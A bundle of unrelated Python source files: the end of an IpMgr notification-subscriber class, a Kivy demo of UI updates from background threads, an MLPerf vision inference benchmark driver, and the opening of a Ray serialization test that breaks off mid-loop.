self.NOTIFLOG : [0x04, None, True],
self.NOTIFDATA : [0x10, None, True],
self.NOTIFIPDATA : [0x20, None, True],
self.NOTIFHEALTHREPORT : [0x40, None, True],
}
self._con = ipMgrConnector
self._thread = None
self._mask = self._unrlblMask = 0
self._isStarted = False
self._lock = threading.Lock()
def start(self):
'''
\brief Start the subscriber _thread.
'''
if self._thread : # Wait finish disconnect process
try :
self._thread.join(1.0)
if self._thread.isAlive() :
raise ApiException.ConnectionError("Already connected")
except RuntimeError :
pass # Ignore join error
self._thread = None
# Clear _callback table
for i in self._callback :
self._callback[i][1] = None
self._callback[i][2] = True
self._mask = self._unrlblMask = 0
self._thread = threading.Thread(target = self._process)
self._thread.name = "IpMgrSubscribe"
self._thread.start()
self._isStarted = True
def subscribe(self, notifTypes, fun, isRlbl):
'''
\brief Subscribe to notification(s).
Calling this function multiple times will not cancel the effects of
the previous calls.
\pre Call start() before calling this function.
\param notifTypes Type(s) of notification(s) to subscribe to. This can
be a single string (when subscribing to a single notification), or
a list of strings (when subscribing to multiple notifications).
The list of possible types is:
ERROR, FINISH, NOTIFEVENT, NOTIFLOG, NOTIFDATA, NOTIFIPDATA, NOTIFHEALTHREPORT, ALLNOTIF
\param fun The function to call when any of the notification types
specified in the notifTypes parameter occurs. If you wish to assign
a different _callback function to different notification types,
call this function multiple times. The signature of the function
needs to be fun(<notification name>, <notification parameter>),
as described below.
\param isRlbl define type of transport using for delivery
notification: reliable (True) or best effort (False)
The _callback function is called with a notification name and a
notification parameter. Depending on the type of notification, the
parameter will be of a different format, according to the table below.
<table>
<tr><th>Notification Name </th><th>Parameter</th>
<tr><td>ERROR </td><td>Exception</td>
<tr><td>FINISH </td><td>''</td>
<tr><td>NOTIFLOG </td><td>Tuple_notifLog</td>
<tr><td>NOTIFDATA </td><td>Tuple_notifData</td>
<tr><td>NOTIFIPDATA </td><td>Tuple_notifIpData</td>
<tr><td>NOTIFHEALTHREPORT </td><td>Tuple_notifHealthReport</td>
<tr><td>EVENTMOTERESET </td><td>Tuple_eventMoteReset</td>
<tr><td>EVENTNETWORKRESET </td><td>Tuple_eventNetworkReset</td>
<tr><td>EVENTCOMMANDFINISHED</td><td>Tuple_eventCommandFinished</td>
<tr><td>EVENTMOTEJOIN </td><td>Tuple_eventMoteJoin</td>
<tr><td>EVENTMOTEOPERATIONAL</td><td>Tuple_eventMoteOperational</td>
<tr><td>EVENTMOTELOST </td><td>Tuple_eventMoteLost</td>
<tr><td>EVENTNETWORKTIME </td><td>Tuple_eventNetworkTime</td>
<tr><td>EVENTPINGRESPONSE </td><td>Tuple_eventPingResponse</td>
<tr><td>EVENTPATHCREATE </td><td>Tuple_eventPathCreate</td>
<tr><td>EVENTPATHDELETE </td><td>Tuple_eventPathDelete</td>
<tr><td>EVENTPACKETSENT </td><td>Tuple_eventPacketSent</td>
<tr><td>EVENTMOTECREATE </td><td>Tuple_eventMoteCreate</td>
<tr><td>EVENTMOTEDELETE </td><td>Tuple_eventMoteDelete</td>
</table>
\exception IpMgrSubscribe.SubscribeError The subscriber hasn't been
started, or the notification type(s) specified is (are) not valid.
'''
if not self._isStarted :
raise self.SubscribeError("Error: subscriber is not started")
if isinstance(notifTypes, str) :
notifTypes = [notifTypes]
for nType in notifTypes : # subscribe type validation
if nType not in self._callback :
raise self.SubscribeError("Error subscribe type: {0}".format(nType))
self._lock.acquire()
for nType in notifTypes :
self._callback[nType][1] = fun
self._callback[nType][2] = isRlbl
self._lock.release()
mask = unrlblMask = 0
# Structure of self._callback.values() :
# [0] - subscription mask mask,
# [1] - cb-function. Notification is subscribed if [1]!=None,
# [2] - transport for notification: True - reliable, false - unreliable
for cb in list(self._callback.values()) :
if cb[1] :
mask = mask | cb[0]
if cb[2] == False :
unrlblMask = unrlblMask | cb[0]
if mask != self._mask or unrlblMask != self._unrlblMask :
self._mask = mask
self._unrlblMask = unrlblMask
self._con.dn_subscribe([0,self._mask], [0,self._unrlblMask])
#======================== private =========================================
def _process(self):
while True :
try :
notif = self._con.getNotification()
name = notif[0]
if name in self._trNotifNameTable :
name = self._trNotifNameTable[name]
self._processOneNotif(name, notif[0], notif[1])
except ApiException.QueueError:
self._processOneNotif(self.FINISH, self.FINISH, '')
self._isStarted = False
break
except Exception as ex :
self._processOneNotif(self.ERROR, self.ERROR, ex)
def _processOneNotif(self, notifType, notifName, payload):
cb = self._getCallback(notifType)
if cb :
cb(notifName, payload)
def _getCallback(self, name) :
res = None
self._lock.acquire()
if name in self._callback :
res = self._callback[name][1]
self._lock.release()
return res
|
threaded.py
|
from kivy.app import App
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.animation import Animation
from kivy.clock import Clock, mainthread
from kivy.uix.gridlayout import GridLayout
import threading
import time
Builder.load_string("""
<AnimWidget@Widget>:
canvas:
Color:
rgba: 0.7, 0.3, 0.9, 1
Rectangle:
pos: self.pos
size: self.size
size_hint: None, None
size: 400, 30
<RootWidget>:
cols: 1
canvas:
Color:
rgba: 0.9, 0.9, 0.9, 1
Rectangle:
pos: self.pos
size: self.size
anim_box: anim_box
but_1: but_1
lab_1: lab_1
lab_2: lab_2
Button:
id: but_1
font_size: 20
text: 'Start second thread'
on_press: root.start_second_thread(lab_2.text)
Label:
id: lab_1
font_size: 30
color: 0.6, 0.6, 0.6, 1
text_size: self.width, None
halign: 'center'
AnchorLayout:
id: anim_box
Label:
id: lab_2
font_size: 100
color: 0.8, 0, 0, 1
text: '3'
""")
class RootWidget(GridLayout):
stop = threading.Event()
def start_second_thread(self, l_text):
threading.Thread(target=self.second_thread, args=(l_text,)).start()
def second_thread(self, label_text):
# Remove a widget, update a widget property, create a new widget,
# add it and animate it in the main thread by scheduling a function
# call with Clock.
Clock.schedule_once(self.start_test, 0)
# Do some thread blocking operations.
time.sleep(5)
l_text = str(int(label_text) * 3000)
# Update a widget property in the main thread by decorating the
# called function with @mainthread.
self.update_label_text(l_text)
# Do some more blocking operations.
time.sleep(2)
# Remove some widgets and update some properties in the main thread
# by decorating the called function with @mainthread.
self.stop_test()
# Start a new thread with an infinite loop and stop the current one.
threading.Thread(target=self.infinite_loop).start()
def start_test(self, *args):
# Remove the button.
self.remove_widget(self.but_1)
# Update a widget property.
self.lab_1.text = ('The UI remains responsive while the '
'second thread is running.')
# Create and add a new widget.
anim_bar = Factory.AnimWidget()
self.anim_box.add_widget(anim_bar)
# Animate the added widget.
anim = Animation(opacity=0.3, width=100, duration=0.6)
anim += Animation(opacity=1, width=400, duration=0.8)
anim.repeat = True
anim.start(anim_bar)
@mainthread
def update_label_text(self, new_text):
self.lab_2.text = new_text
@mainthread
def stop_test(self):
self.lab_1.text = ('Second thread exited, a new thread has started. '
'Close the app to exit the new thread and stop '
'the main process.')
self.lab_2.text = str(int(self.lab_2.text) + 1)
self.remove_widget(self.anim_box)
def infinite_loop(self):
iteration = 0
while True:
if self.stop.is_set():
# Stop running this thread so the main Python process can exit.
return
iteration += 1
print('Infinite loop, iteration {}.'.format(iteration))
time.sleep(1)
class ThreadedApp(App):
def on_stop(self):
# The Kivy event loop is about to stop, set a stop signal;
# otherwise the app window will close, but the Python process will
# keep running until all secondary threads exit.
self.root.stop.set()
def build(self):
return RootWidget()
if __name__ == '__main__':
ThreadedApp().run()
|
main.py
|
"""
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import glob
import json
import logging
import os
import shutil
import sys
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
import coco
import accuracy
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"imagenet":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_ncore":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommonNcore(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet":
(imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet_ncore":
(imagenet.Imagenet, dataset.pre_process_mobilenet_uint8, dataset.PostProcessArgMaxNcore(offset=-1),
{"image_size": [224, 224, 3]}),
"coco-300":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
{"image_size": [300, 300, 3]}),
"coco-300-ncore":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCocoNcore(),
{"image_size": [300, 300, 3]}),
"coco-300-pt":
(coco.Coco, dataset.pre_process_coco_pt_mobilenet, coco.PostProcessCocoPt(False,0.3),
{"image_size": [300, 300, 3]}),
"coco-1200":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCoco(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-onnx":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoOnnx(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-pt":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True,0.05),
{"image_size": [1200, 1200, 3],"use_label_map": True}),
"coco-1200-pt-calibrate":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True,0.05),
{"image_size": [1200, 1200, 3],"use_label_map": True, "calibrate": True, "split": "train2017"}),
"coco-1200-tf":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoTf(),
{"image_size": [1200, 1200, 3],"use_label_map": False}),
}
# pre-defined command line options so simplify things. They are used as defaults and can be
# overwritten from command line
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"max-batchsize": 32,
},
# resnet
"resnet50-tf-calibrate": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tflite-calibrate",
"model-name": "resnet50",
},
"resnet50-tf-ncore": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet_ncore",
"backend": "tflite-ncore-resnet",
"model-name": "resnet50",
},
"resnet50-tf-ncore-offline": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet_ncore",
"backend": "tflite-ncore-resnet-offline",
"model-name": "resnet50",
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
"model-name": "resnet50",
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"model-name": "mobilenet",
},
"mobilenet-tf-ncore": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet_ncore",
"backend": "tflite-ncore-mobilenet",
"model-name": "mobilenet",
},
"mobilenet-tf-ncore-offline": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet_ncore",
"backend": "tflite-ncore-mobilenet-offline",
"model-name": "mobilenet",
},
"mobilenet-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"model-name": "mobilenet",
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco-300",
"backend": "tensorflow",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-tflite": {
"inputs": "image_tensor:0",
"outputs": "detection_boxes:0,detection_classes:0,detection_scores:0,num_detections:0",
"dataset": "coco-300",
"backend": "tensorflow",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-tf-ncore": {
"inputs": "image_tensor:0",
"outputs": "detection_boxes:0,detection_classes:0,detection_scores:0,num_detections:0",
"dataset": "coco-300-ncore",
"backend": "tflite-ncore-ssd",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-tf-ncore-offline": {
"inputs": "image_tensor:0",
"outputs": "detection_boxes:0,detection_classes:0,detection_scores:0,num_detections:0",
"dataset": "coco-300-ncore",
"backend": "tflite-ncore-ssd-offline",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-300-pt",
"backend": "pytorch-native",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco-300",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-mobilenet",
},
# ssd-resnet34
"ssd-resnet34-tf": {
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"dataset": "coco-1200-tf",
"backend": "tensorflow",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-pytorch-calibrate": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native-calibrate",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime": {
"dataset": "coco-1200-onnx",
"inputs": "image",
"outputs": "bboxes,labels,scores",
"backend": "onnxruntime",
"data-format": "NCHW",
"max-batchsize": 1,
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime-tf": {
"dataset": "coco-1200-tf",
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-resnet34",
},
}
SCENARIO_MAP = {
"SingleStream": lg.TestScenario.SingleStream,
"MultiStream": lg.TestScenario.MultiStream,
"Server": lg.TestScenario.Server,
"Offline": lg.TestScenario.Offline,
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
help="mlperf benchmark scenario, one of " + str(list(SCENARIO_MAP.keys())))
parser.add_argument("--max-batchsize", type=int, help="max batch size in a single inference")
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--output", help="test results")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--model-name", help="name of the mlperf model, ie. resnet50")
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--qps", type=int, help="target qps")
parser.add_argument("--cache", type=int, default=0, help="use cache")
parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
parser.add_argument("--find-peak-performance", action="store_true", help="enable finding peak performance pass")
# file to use mlperf rules compliant parameters
parser.add_argument("--mlperf_conf", default="../../mlperf.conf", help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument("--user_conf", default="user.conf", help="user config for user LoadGen settings such as target QPS")
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("--count", type=int, help="dataset items to use")
parser.add_argument("--max-latency", type=float, help="mlperf max latency in pct tile")
parser.add_argument("--samples-per-query", type=int, help="mlperf multi-stream sample per query")
args = parser.parse_args()
# don't use defaults in argparser. Instead we default to a dict, override that with a profile
# and take this as default unless command line give
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.scenario not in SCENARIO_MAP:
parser.error("valid scanarios:" + str(list(SCENARIO_MAP.keys())))
return args
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
backend = BackendPytorchNative()
elif backend == "pytorch-centaur":
from backend_pytorch_centaur import BackendPytorchCentaur
backend = BackendPytorchCentaur()
elif backend == "pytorch-native-calibrate":
from backend_pytorch_native_calibrate import BackendPytorchNativeCalibrate
backend = BackendPytorchNativeCalibrate()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
elif backend == "tflite-calibrate":
from backend_tflite_calibrate import BackendTflite
backend = BackendTflite()
elif backend == "tflite-ncore":
from backend_tflite_ncore import BackendTfliteNcore
backend = BackendTfliteNcore()
elif backend == "tflite-ncore-mobilenet":
from backend_libncoretflite import BackendTfliteNcoreMobileNetV1
backend = BackendTfliteNcoreMobileNetV1()
backend.inputs = ["image_tensor:0"]
elif backend == "tflite-ncore-resnet":
from backend_libncoretflite import BackendTfliteNcoreResnet
backend = BackendTfliteNcoreResnet()
backend.inputs = ["image_tensor:0"]
elif backend == "tflite-ncore-ssd":
from backend_libncoretflite import BackendTfliteNcoreSSD
backend = BackendTfliteNcoreSSD()
backend.inputs = ["image_tensor:0"]
elif backend == "tflite-ncore-mobilenet-offline":
from backend_libncoretflite import BackendTfliteNcoreMobileNetV1Offline
backend = BackendTfliteNcoreMobileNetV1Offline()
backend.inputs = ["image_tensor:0"]
elif backend == "tflite-ncore-resnet-offline":
from backend_libncoretflite import BackendTfliteNcoreResnetOffline
backend = BackendTfliteNcoreResnetOffline()
backend.inputs = ["image_tensor:0"]
elif backend == "tflite-ncore-ssd-offline":
from backend_libncoretflite import BackendTfliteNcoreSSDOffline
backend = BackendTfliteNcoreSSDOffline()
backend.inputs = ["image_tensor:0"]
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, img, label=None):
self.query_id = query_id
self.content_id = content_id
self.img = img
self.label = label
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.take_accuracy = False
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
results = self.model.predict({self.model.inputs[0]: qitem.img})
processed_results = self.post_process(results, qitem.content_id, qitem.label, self.result_dict)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
response_array_refs = []
response = []
for idx, query_id in enumerate(qitem.query_id):
response_array = array.array("B", np.array(processed_results[idx], np.float32).tobytes())
response_array_refs.append(response_array)
bi = response_array.buffer_info()
response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
lg.QuerySamplesComplete(response)
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) <= self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
data, label = self.ds.get_samples(idx[i:i+bs])
self.run_one_item(Item(query_id[i:i+bs], idx[i:i+bs], data, label))
def finish(self):
pass
class QueueRunner(RunnerBase):
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
super().__init__(model, ds, threads, post_proc, max_batchsize)
self.tasks = Queue(maxsize=threads * 4)
self.workers = []
self.result_dict = {}
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
# None in the queue indicates the parent want us to exit
tasks_queue.task_done()
break
self.run_one_item(qitem)
tasks_queue.task_done()
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) <= self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.tasks.put(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
ie = i + bs
data, label = self.ds.get_samples(idx[i:ie])
self.tasks.put(Item(query_id[i:ie], idx[i:ie], data, label))
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": len(result_list),
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "mAP" in result_dict:
result["mAP"] = 100. * result_dict["mAP"]
acc_str += ", mAP={:.3f}%".format(result["mAP"])
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str,
len(result_list), buckets_str))
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend)
if getattr(backend, "max_batchsize", -1) != -1:
backend.max_batchsize = args.max_batchsize
# override image format if given
image_format = args.data_format if args.data_format else backend.image_format()
# --count applies to accuracy mode only and can be used to limit the number of images
# for testing. For perf model we always limit count to 200.
count_override = False
count = args.count
if count:
count_override = True
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
ds = wanted_dataset(data_path=args.dataset_path,
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=pre_proc,
use_cache=args.cache,
count=count, **kwargs)
# load model to backend
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
mlperf_conf = os.path.abspath(args.mlperf_conf)
if not os.path.exists(mlperf_conf):
log.error("{} not found".format(mlperf_conf))
sys.exit(1)
user_conf = os.path.abspath(args.user_conf)
if not os.path.exists(user_conf):
log.error("{} not found".format(user_conf))
sys.exit(1)
audit_config_cp_loc = None
if args.output:
output_dir = os.path.abspath(args.output)
os.makedirs(output_dir, exist_ok=True)
# Check if audit.config file is used, copy to output directory before
# we chdir to that location so loadgen can find it
audit_files = glob.glob("ncoresw/mlperf/vision/classification_and_detection/*audit.config")
if len(audit_files):
log.info("Found audit.config (" + audit_files[0] + ")")
audit_config_cp_loc = os.path.join(output_dir, "audit.config")
# If user already put audit.config at `output` directory, then use
# that one. Otherwise, copy the one we found in the current
# directory (before chdir to new output directory).
if os.path.exists(audit_config_cp_loc):
log.info("WARNING: audit.config already exists, so cannot copy over new audit file!")
log.info(audit_config_cp_loc)
audit_config_cp_loc = None
else:
shutil.copy(audit_files[0], audit_config_cp_loc)
os.chdir(output_dir)
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
warmup_queries = range(args.max_batchsize)
ds.load_query_samples(warmup_queries)
for _ in range(2):
img, _ = ds.get_samples(warmup_queries)
_ = backend.predict({backend.inputs[0]: img})
ds.unload_query_samples(None)
scenario = SCENARIO_MAP[args.scenario]
runner_map = {
lg.TestScenario.SingleStream: RunnerBase,
lg.TestScenario.MultiStream: QueueRunner,
lg.TestScenario.Server: QueueRunner,
lg.TestScenario.Offline: QueueRunner
}
runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, max_batchsize=args.max_batchsize)
def issue_queries(query_samples):
runner.enqueue(query_samples)
def flush_queries():
pass
def process_latencies(latencies_ns):
# called by loadgen to show us the recorded latencies
global last_timeing
last_timeing = [t / NANO_SEC for t in latencies_ns]
settings = lg.TestSettings()
settings.FromConfig(mlperf_conf, args.model_name, args.scenario)
settings.FromConfig(user_conf, args.model_name, args.scenario)
settings.scenario = scenario
settings.mode = lg.TestMode.PerformanceOnly
if args.accuracy:
settings.mode = lg.TestMode.AccuracyOnly
if args.find_peak_performance:
settings.mode = lg.TestMode.FindPeakPerformance
if args.time:
# override the time we want to run
settings.min_duration_ms = args.time * MILLI_SEC
settings.max_duration_ms = args.time * MILLI_SEC
if args.qps:
qps = float(args.qps)
settings.server_target_qps = qps
settings.offline_expected_qps = qps
if count_override:
settings.min_query_count = count
settings.max_query_count = count
if args.samples_per_query:
settings.multi_stream_samples_per_query = args.samples_per_query
if args.max_latency:
settings.server_target_latency_ns = int(args.max_latency * NANO_SEC)
settings.multi_stream_target_latency_ns = int(args.max_latency * NANO_SEC)
# override target latency when it needs to be less than 1ms
if args.model_name == "mobilenet":
settings.single_stream_expected_latency_ns = 200000
elif args.model_name == "resnet50":
settings.single_stream_expected_latency_ns = 900000
elif args.model_name == "ssd-mobilenet":
settings.single_stream_expected_latency_ns = 900000
sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
qsl = lg.ConstructQSL(count, min(count, 1024), ds.load_query_samples, ds.unload_query_samples)
log.info("starting {}".format(scenario))
result_dict = {"good": 0, "total": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
lg.StartTest(sut, qsl, settings)
if not last_timeing:
last_timeing = runner.result_timing
if args.accuracy:
post_proc.finalize(result_dict, ds, output_dir=args.output)
add_results(final_results, "{}".format(scenario),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
# Dump the summary logs to stdout for convenience
log.info("Output dir: " + os.path.abspath(output_dir))
with open(os.path.join(output_dir, "mlperf_log_summary.txt"), 'r') as f:
log.info(f.read())
# Output accuracy txt file
if args.accuracy:
with open(os.path.join(output_dir, "accuracy.txt"), "w") as f_acc:
# SSD accuracy calculation
#----------------------------------------
# The mAP is already stored in result_dict["mAP"], but we'll call
# `accuracy_coco()` just to keep the submission process consistent.
if args.model_name == "ssd-mobilenet":
accuracy_str = accuracy.CocoAcc(
mlperf_accuracy_file = os.path.join(output_dir, "mlperf_log_accuracy.json"),
coco_dir = args.dataset_path
).get_accuracy() + "\n"
f_acc.write(accuracy_str)
log.info(accuracy_str)
if args.model_name == "ssd-resnet34":
accuracy_str = accuracy.CocoAcc(
mlperf_accuracy_file = os.path.join(output_dir, "mlperf_log_accuracy.json"),
coco_dir = args.dataset_path,
use_inv_map = True,
remove_48_empty_images = False
).get_accuracy() + "\n"
f_acc.write(accuracy_str)
log.info(accuracy_str)
# ImageNet accuracy calculation
#----------------------------------------
# The good / total values are already stored in result_dict["good"]
# and result_dict["total"], but we'll call `accuracy_imagenet()`
# just to keep the submission process consistent.
else:
accuracy_str = accuracy.ImagenetAcc(
mlperf_accuracy_file = os.path.join(output_dir, "mlperf_log_accuracy.json"),
imagenet_val_file = os.path.join(args.dataset_path, "val_map.txt")
).get_accuracy() + "\n"
f_acc.write(accuracy_str)
log.info(accuracy_str)
#
# write final results
#
if args.output:
with open("results.json", "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if audit_config_cp_loc != None:
os.remove(audit_config_cp_loc)
backend_destroy = getattr(backend, "destroy", None)
if callable(backend_destroy):
backend.destroy()
if __name__ == "__main__":
main()
|
test_basic.py
|
# coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from concurrent.futures import ThreadPoolExecutor
import json
import logging
import os
import random
import re
import setproctitle
import shutil
import six
import socket
import string
import subprocess
import sys
import tempfile
import threading
import time
import numpy as np
import pickle
import pytest
import ray
import ray.tests.cluster_utils
import ray.tests.utils
from ray.utils import _random_string
logger = logging.getLogger(__name__)
def test_simple_serialization(ray_start_regular):
primitive_objects = [
# Various primitive types.
0,
0.0,
0.9,
1 << 62,
1 << 999,
"a",
string.printable,
"\u262F",
u"hello world",
u"\xff\xfe\x9c\x001\x000\x00",
None,
True,
False,
[],
(),
{},
type,
int,
set(),
# Collections types.
collections.Counter([np.random.randint(0, 10) for _ in range(100)]),
collections.OrderedDict([("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: 0, [("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: [], [("hello", 1), ("world", 2)]),
collections.deque([1, 2, 3, "a", "b", "c", 3.5]),
# Numpy dtypes.
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
]
if sys.version_info < (3, 0):
primitive_objects.append(long(0)) # noqa: E501,F821
composite_objects = (
[[obj]
for obj in primitive_objects] + [(obj, )
for obj in primitive_objects] + [{
(): obj
} for obj in primitive_objects])
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in primitive_objects + composite_objects:
